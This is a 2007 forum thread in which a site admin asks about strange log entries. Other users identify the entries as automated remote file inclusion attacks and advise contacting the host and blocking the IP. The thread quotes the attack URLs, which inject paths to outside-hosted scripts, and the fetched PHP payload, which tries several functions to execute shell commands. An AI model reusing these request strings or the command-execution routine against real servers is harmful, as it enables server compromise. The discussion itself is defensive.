Unknown Actions

Max™ · December 22, 2007, 05:14:17 PM

Can anyone explain what this user is trying to do?.. i think its some kind of hack?
they keep changing ips, but from the strange actions and " libwww-perl/5.65" after the ip i know its the same person.

Guest(158.251.4.110, libwww-perl/5.65)
Time 09:48:06 pm Unknown Action

Unknown actions are something like this....

[Unknown Action]
http://myforum.com/ndex.php?action=pm//embed/day.php?path=http://filicudi.t35.com/cs.txt??;embed;day_php?path=http:;filicudi_t35_com;cs_txt [nofollow]??

going onto the link (http://filicudi.t35.com/cs.txt [nofollow]) brings up some kind of remote code?

Code Select

<?php
echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

another one yesterday was...

(64.118.86.20, libwww-perl/5.808)
Unknown Action - http://myforum.com/index.php?action=register/Calendar.php?sourcedir=http://www.unad.edu.co/induccion/site/modules/pr.txt??;egister;Calendar_php?sourcedir=http:;www_unad_edu_co;induccion;site;modules;pr_txt?? [nofollow]

http://www.unad.edu.co/induccion/site/modules/pr.txt [nofollow] that link is dead now but its the same code as above.

Tony Reid · December 22, 2007, 05:17:30 PM

Yes - they are trying to hack you.

Let your host know.

Max™ · December 22, 2007, 05:26:28 PM

yeah kinda figured... but what are they tryin to do exactly kinda curious.

Tony Reid · December 22, 2007, 05:28:15 PM

Get command line access to your server.

Daniel15 · December 22, 2007, 09:41:25 PM

They're trying to hack you. Be assured, this will not work with SMF. Most likely, it's an automated (scripted) attack against a huge number of sites.

Quotelibwww-perl/5.65

This means they're using a Perl script to do this.

Quotebrings up some kind of remote code?

That tries using various methods to run the "id" command, which returns the user and groups the Apache user runs under. I'm guessing just as a proof-of-concept, and to see if they can run other commands.

H · December 23, 2007, 11:32:54 AM

You may also want to block their IP just to save yourself a small bit of bandwidth

News:

Unknown Actions

Max™

Tony Reid

Max™

Tony Reid

Daniel15

H